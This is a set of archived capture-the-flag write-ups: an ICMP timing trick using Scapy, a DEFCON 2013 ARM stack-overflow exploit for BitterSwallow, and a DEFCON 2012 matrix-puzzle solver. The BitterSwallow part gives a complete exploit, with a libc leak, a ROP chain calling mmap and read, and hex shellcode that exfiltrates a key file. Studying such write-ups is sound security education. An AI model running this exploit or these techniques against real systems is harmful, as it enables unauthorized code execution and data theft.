Meanwhile, we tried to use the scapy Python module to reply to the pings instead of the kernel. We first tried to prevent the kernel from answering, but dropping the ICMP packets with iptables didn’t work, apparently because the answering part is lower than iptables in the network stack of the Linux kernel in order to make these replies fast. So we decided to disable these replies globally by enabling the net.ipv4.icmp_echo_ignore_all.

Then, we wrote the Scapy script to respond to ping requests with fine adjustment of time.sleep() before our replies in function of which of the three servers we were replying. This script did work great but the results were really random due to network latency and probably our strange solution of replying to pings in userland. So now we had a plane that randomly wandered all over the map… ok great…

We tried to adjust the time.sleep parameter but the result was just too random to be useful. Another problem was that the sleeps accumulated over our replies because scapy queues the requests so we were accumulating requests too much and, after a while, were answering with more than one minute of delay.

So to fix these problems, we decided to modify the script to spawn threads for the replies, to avoid the accumulation of sleeps, so we could have big delay time (30 seconds or so) that would allow us to compensate the random network delay and finely tune the delays to reach exactly the appropriate locations. But we first modified the first script to make the delays totally random and launched it in background, just in case…

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
from scapy.all import *
import time, random

SRC = ["54.212.115.245", "54.232.216.98", "54.250.176.246"]

def callback(pkt):
        if pkt[IP].proto == 1 and pkt[IP].src in SRC:
                if pkt[IP].src in SRC:
                        time.sleep(random.randint(0,400)/1000.0)
                send(IP(dst=pkt[IP].src)/ICMP(type=0, id=0, seq=0)/Raw(load=pkt[Raw].load))

sniff(prn=callback, filter="(src host 54.212.115.245 or src host 54.232.216.98 or src host 54.250.176.246) and icmp", store=0)

And it worked, before we could finish the new script, the first one made us reach the three circles successfully, giving us the flag: ebCTF{9bd26cbffa30c0ea32c425df220f06b9}.

DEFCON 2013 Quals: BittersWallow - Exploitation (0x41414141) 1

Written by Franck Michea, 2013-06-21 22:00:00

This articles was originally written for LSE Blog with Bruno Pujos. It was archived here. Check this awesome blog out too!

1
2
Score 1
Link http://assets-2013.legitbs.net/liabilities/bs

This binary was compiled for the ARM architecture, and our goal was to exploit it to get the "key" file on the remote server. The first part of the binary does the setup of all the common things found in pwnables, including:

  • opening a socket
  • identifying itself as a pre-define user (bitterswallow)
  • dropping privileges

The interesting part comes after, in a function called ff. The first thing it does is send some text:

1
2
Welcome to the sums.
Are you ready? (y/n):

And wait for an answer. It then compares it to 'y' or 'Y'. If the answer is different it simply closes the connection. Once this is done we enter a loop where two functions are called.

The first one waits for an input of one byte and then goes into a big switch according to this byte. All the cases but one come back to the same point (0xa114) where it waits for another user input which is the length of a future message. The length sent can't be over 0x400. The particular case, triggered with value 0x1a, doesn't check this and doesn't even ask for any length.

The pseudo C code for this function is :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
int get_meta(int fd, int *input, int *value_get) {
    int choice;
    int value;
    long long int size;
    if (!input || !value_get || !recvdata(fd, &choice, 1))
        return 0;
    *input = choice;
    switch (choice & 0x3f) {
        case 0:
            value = 0x32444d; // Some value?
            break;
        // ...
        case 0x1a:
            goto last;
        // ...
        default:
            break;
    }

    if (!recvdata(fd, &size, 2))
        return 0;

    if (size > 0x400)
        size = 0x400;
    last:
    size = (size << 16) >> 16;
    *value_get = value;
    return size;
}

Then a second function is called. It receives data of the size returned by the first one in a buffer of 0x400, and then computes a hash (depending on the values chosen in the first function), except for the case 0x1a which doesn't compute the hash. It then sends this hash and asks if we want do all the loop again.

Here is the pseudo C code for this function :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
int compute(int fd, int size, int input, int value_get) {
    int res_recv;
    char buf[0x400];
    char buf_hash[0x40];

    memset(buf, 0, 0x400);
    memset(buf_hash, 0, 0x40);

    printf("%x %x %x\n", size, input, value_get);
    recvdata(fd, buf, size);

    switch (input & 0x3f) {
        case 0 :
            res_recv = ...
            hash(buf, size, buf_hash);
            break;
        ...
        case 0x1a :
            res_recv = 0;
            break;
        ...
        default:
            break;
    }
    send_data(fd, buf_hash, res_recv);
    send_string(fd, "Would you like to sum another? (y/n): ");
    recvdata(fd, &res_recv, 1);
    if (res_recv == 'y' || res_recv == 'Y')
        return 1;
    else
        return 0;
}

In the caller of this function the loop will continue or it will stop. To exploit this function the goal is to change the size that returns the first function being used with the second one. Since the case 0x1a doesn't do any check, we will use it to return the false size and then rewrite our stack to use Return-Oriented-Programming.

To rewrite the size we can use the second function that writes on the same part of the stack, the content of size is in the same place than the end of the hash buffer.

So we need to: - do a normal computation that rewrites something at the place of size - do another iteration with the choice 0x1a and rewrite all our stack.

One of the problems that we need to take care of is not to have a value which is too big because we risk to rewrite all of our stack which can make our exploit fail.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
_recv("Welcome to the sums.\n")
_recv("Are you ready? (y/n): ")
_send("y")
_send(b"\x32") # case 50 : sha512
_send(b"\x00\x03") # send a size
_send("x" * 0x300) # send a value, with this we have a size of 0x7b3
while len(_recv(1024)) == 1024: # pass all the writing
    pass
_send("y") # say yes to do an other one
_send(b"\x1a") # case 0x1a : doesn't check the size
# Here we can send the data for rewritting our stack

At this point we can rewrite our stack but we don't have any address from the libc so we can't do a lot of things. There is no syscall in the binary so we can't do anything with full ROP yet.

The first thing to do is to leak some information on the libc, like an address from the GOT which gives us the information on where libc is mapped. We chose to leak the address of getpwnam (but any other function could work).

To leak the address of getpwnam we needed to call the send_data function (0x1d9fc) on the position of the entry for getpwnam in the GOT. The first arguments of a function in ARM are given through the registers r0, r1, r2 and R3, so we needed some gadget that takes values from the stack and puts them in the registers that we need. The gadget we used to do this is in __libc_csu_init:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
loc_1E3C4
    LDR R3, [R5], #4
    MOV R0, R6                      ; loc_1E3C8
    MOV R1, R7
    MOV R2, R8
    ADD R4, R4, #1
    BLX R3
    CMP R4, R10
    BNE loc_1E3C4

loc_1E3E4:
    LDMFD SP!, {R3-R8, R10, PC}

If we go to 0x1e3e4 we can put values in registers from r3 to r8, r10 and chose the position of return from our stack. In 0x1e3c8 we can copy the values from r6 to r8 in r0 to r2 (our first arguments) and then call the function stored in r3 and if we put the good value in r4 and r10 we will have our first gadget again. Note that if we need to make a call with some values in registers like r3 (something other than the function address), we can call our first gadget and have these values in the stack too (useful to call mmap).

So we now have everything we need to leak the address from the libc. Here is the code we used to do so:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
import struct
import socket
import sys

HOST = 'bitterswallow.shallweplayaga.me'
PORT = 6492

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

def _send(st, end=b''):
    if isinstance(st, str):
        st = bytes(st, 'utf-8')
    st += end
    print('Send:', repr(st))
    return s.send(st)

def _recv(l):
    if isinstance(l, str):
        l = len(l)
    r = s.recv(l)
    if r:
        print('Recv:', repr(r))
    return r

def _pack(i):
    return struct.pack('<I', i)

def _unpack(b):
    return struct.unpack('<I', b)[0]

PIVOT_ADDR = 0x1e3e4
PIVOT2_ADDR = 0x1e3c8

SENDDATA_ADDR = 0x1d9fc
FF_ADDR = 0x8dfc

GETPWNAM_GOT_ADDR = 0x27114

SOCKET_FD = 4
USELESS = 0x46474849

# length of 8 int
def _call_func(addr, arg1, arg2, arg3):
    payload = _pack(addr)            # call addr.
    payload += _pack(0)              # counter loop (r4)
    payload += b'\x41' * 4           # padding.
    payload += _pack(arg1)           # first arg (r6)        (fd)
    payload += _pack(arg2)           # second arg (r7)       (data)
    payload += _pack(arg3)           # third arg (r8)        (length)
    payload += _pack(1)              # counter higher stone. (r10)
    payload += _pack(PIVOT2_ADDR)    # next addr (pc)
    return payload

def _send_bof(payload):
    p = b"a" * 0x440
    p += _pack(0x41424344)
    p += _pack(PIVOT_ADDR)
    p += payload
    p += b'y' * (0x7b3 - len(p)) # 0xe70
    _send(p)

def pass_menu():
    _recv("Welcome to the sums.\n")
    _recv("Are you ready? (y/n): ")
    _send("y")
    _send(b"\x32") # case 50 : sha512
    _send(b"\x00\x03") # send a size
    _send("x" * 0x300) # send a value, with this we have a size of 0x7b3
    while len(_recv(1024)) == 1024: # pass all the writing
        pass
    _send("y") # say yes to do an other one
    _send(b"\x1a") # case 0x1a : doesn't check the size

input('Ready?')

# Stage 1:
pass_menu() # we get pass the menu

payload = _call_func(SENDDATA_ADDR, SOCKET_FD, GETPWNAM_GOT_ADDR, 40)
payload += _call_func(FF_ADDR, SOCKET_FD, USELESS, USELESS)
_send_bof(payload) #we send our payload
_send("y") # we send this because we need a flush
addrs = _recv(38)
addrs = _recv(40)
addrs = _recv(40) # the four first char are the address of getpwnam in the libc

Now that we have the address of getpwnam, we can leak information from the libc.

At this point you have two possibilities: you can leak all the libc, compute the offset of a function compared to the address of getpwnam and call it (ret2libc). The other possibility is to leak part of the libc and find some gadgets in there to finish the exploitation with full ROP. We chose to try and search syscalls in the libc, so the second option.

When leaking the instructions from the libc we look for one particular instruction : a syscall (svc 0, opcode 0x000000ef)

We find this instruction in getpwnam implementation: the syscall was at the offset 428. (This offset changes depending on your libc so you should recompute them if you are not using the exact same libc). The gadget for the syscall is:

1
2
3
4
5
6
SVC 0
B loc_AAA
loc_AAA:
LDR R0, [SP, 0x14]
ADD SP, SP, 0x18
LDMFD SP!, {R4-R10, PC}

The gadget for the pop is : :::nasm LDMFD SP!, {R4-R10, PC}

In order to leak the offset we use the following code :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
pass_menu()
print("Addr: ", addrs)
payload = _call_func(SENDDATA_ADDR, SOCKET_FD, _unpack(addrs[:4]), 4096)
payload += _call_func(FF_ADDR, SOCKET_FD, USELESS, USELESS)
_send_bof(payload)
_send("y")

while len(_recv(1024)) == 1024:
    pass
while len(_recv(1024)) == 1024:
    pass

CHUNK = 1024
r = _recv(CHUNK)
res = r
while len(r) == CHUNK:
    r = _recv(CHUNK)
    res += r
_send('y')
while len(r) == CHUNK:
    r = _recv(CHUNK)
    res += r
_send('y')
while len(r) == CHUNK:
    r = _recv(CHUNK)
    res += r

print(' RES:', res[:12])
for i in range(len(res) // 4):
    opcode = _unpack(res[i * 4:(i + 1) * 4])
    if opcode == 0xef000000: # looking for the syscall
        print('Found syscall opcode at offset:', i * 4)
        print('Buff:', res[i * 4:(i + 5) * 4])

_send("y")
while len(_recv(1024)) == 1024:
    pass
_send("y")
while len(_recv(1024)) == 1024:
    pass

Now that we have the offset of our gadget we can ROP. Our goal is to call mmap and then to read from our input into the allocated page and finally to execute it.

The following code will do that :

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
MMAP_BUF_ADDR = 0x13371000

MMAP_SYSCALL = 192
READ_SYSCALL = 3

OFFSET = 428

GETPWNAM_ADDR = _unpack(addrs[:4])
print('getpwnam addr:', hex(GETPWNAM_ADDR))

pass_menu()
# jump to pivot addr and put some stuf in the register for the syscall
payload = _call_func(PIVOT_ADDR, MMAP_BUF_ADDR, 4096, 7)
payload += _pack(0x32) # some flag
payload += _pack(0x41424344) * 3 # padding
payload += _pack(MMAP_SYSCALL) # the number of the syscall is in r7
payload += _pack(0x41424344) * 2 #padding
payload += _pack(GETPWNAM_ADDR + OFFSET) # addr of the syscall
payload += _pack(0xffffffff) # padding
payload += _pack(0) * 12 # padding
payload += _pack(PIVOT_ADDR) # return addr
# pushing again for an other syscall
payload += _call_func(PIVOT_ADDR, SOCKET_FD, MMAP_BUF_ADDR, 4096) 
payload += _pack(0x41424344) * 4 # padding
payload += _pack(READ_SYSCALL) # the number of the syscall
payload += _pack(0x41424344) * 2 # padding
payload += _pack(GETPWNAM_ADDR + OFFSET) # addr of the syscall gadget
payload += _pack(0) * 13 # padding
payload += _pack(MMAP_BUF_ADDR) # the last return to our shellcode
_send_bof(payload)
_recv(1024)
_send('y')
_recv(1024)

At this point we only needed to send it the shellcode. We wrote one that was pretty simple :

  • open the file "key".
  • read its content.
  • write the buffer read on the socket.

Here is the final code for sending the shellcode and recv the result :

1
2
3
4
5
6
7
8
9
# sending shellcode.
# fd = open("key"); read(fd, addr_in_stack, 255); write(socket_fd, addr_in_stack, 255); 
shellcode = '0f00a0e1400080e20010a0e30570a0e3000000ef01dc4de201dc4de20d10a'
shellcode += '0e1ff20a0e30370a0e3000000ef0400a0e30d10a0e1ff20a0e30470a0e30'
shellcode += '00000ef01dc8de201dc8de26b65790000000000'
_send(bytes.fromhex(shellcode))

while _recv(1024):
    pass

You can find the complete exploit here.

DEFCON2K12 Prequals: gb300 writeup

Written by Franck Michea, 2012-06-05 18:29:07

This articles was originally written for LSE Blog. It was archived here. Check this awesome blog out too!

For this challenge, we had an IP, a port and a password. Like most of the other exercices, it was first waiting for the password and then sent us some stuff. Format of the datas was as follow:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
DD GOTP ATM sckimmer v0.0000001

Sun Jun -9 20:58:58

 4  2  3  1  2  3
 1  8  9  9  6  0
 7  6  0  7  8  4
 0  2  8  0  9  2
 7  3  6  8  6  3
 1  9  4  4  1  7
User entered: 1 4 8 3

The matrix thing was displayed 4 times with only 3 user inputs (linked to the 3 first matrices). We were asked to enter the right input for the last matrix.

While observing what was sent and trying to answer, one of us noticed that by stacking the matrices and the user inputs, we were generating lists of 4 and 3 values respectively. The user inputs lists could be matched with 4 of the matrices lists. The answer could then be obtained from the last value of the four matched lists. Sadly there was a timeout and it was really difficult to find the right answer in time by sight, so we decided to write a python script.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#! /usr/bin/env python2

import re
import sys
import socket

sckt = socket.create_connection(('140.197.217.85', 10435))

def discard(message):
    print sckt.recv(len(message) + 1)

COLOR = {'c': '\x1b\[\d+;\d+;\d+m'}
LINE = re.compile(
    '^%(c)s (\d) %(c)s (\d) %(c)s (\d) %(c)s (\d) %(c)s (\d) %(c)s (\d) %(c)s$' % COLOR
)
UINPUT = re.compile('^%(c)sUser entered: (\d) (\d) (\d) (\d) $' % COLOR)

def get_matrix(matrix):
    for nb_line in xrange(6):
        line = sckt.recv(89)
        if len(line) < 89:
            line += sckt.recv(89 - len(line))
        print line
        match = LINE.match(line)
        if match is None:
            sys.exit('Failed to parse number line.')
        else:
            for column in xrange(6):
                matrix[nb_line * 6 + column].append(int(match.group(1 + column)))

def get_user_input(user_input):
    line = sckt.recv(32)
    print line
    match = UINPUT.match(line)
    if match is not None:
        for x in xrange(4):
            user_input[x].append(int(match.group(1 + x)))

sckt.send('5fd78efc6620f6\n')

discard('\x1b[0;37;40m')
discard('DD GOTP ATM skimmer v0.0000001')

for _ in xrange(5): # [1]
    matrix = [[] for _ in xrange(36)]
    user_input = [[] for _ in xrange(4)]
    for x in xrange(4):
        if x != 3:
            discard('Sun Jun-10 20:58:58 2012')
            discard(' ')
        get_matrix(matrix)
        get_user_input(user_input)
        print matrix
        print user_input
        if x != 3: discard(' ')
        else:
            res = [0] * 4
            for it in xrange(4):
                inpt = user_input[it]
                for lst in matrix:
                    if lst[:-1] == inpt:
                        res[it] = lst[-1]
                        break
            result = '%d %d %d %d\n' % (res[0], res[1], res[2], res[3])
            print result,
            sckt.send(result)

After some loops it finally gave something that looked like a menu of a cash machine, the balance of the account, and closed the connection. The balance was the flag: 9238740982570237012935.32.

[1] for here is due to some tests we did to find how many times was necessary to win, but we didn't find it and since we already had the key we moved on after 5 minutes.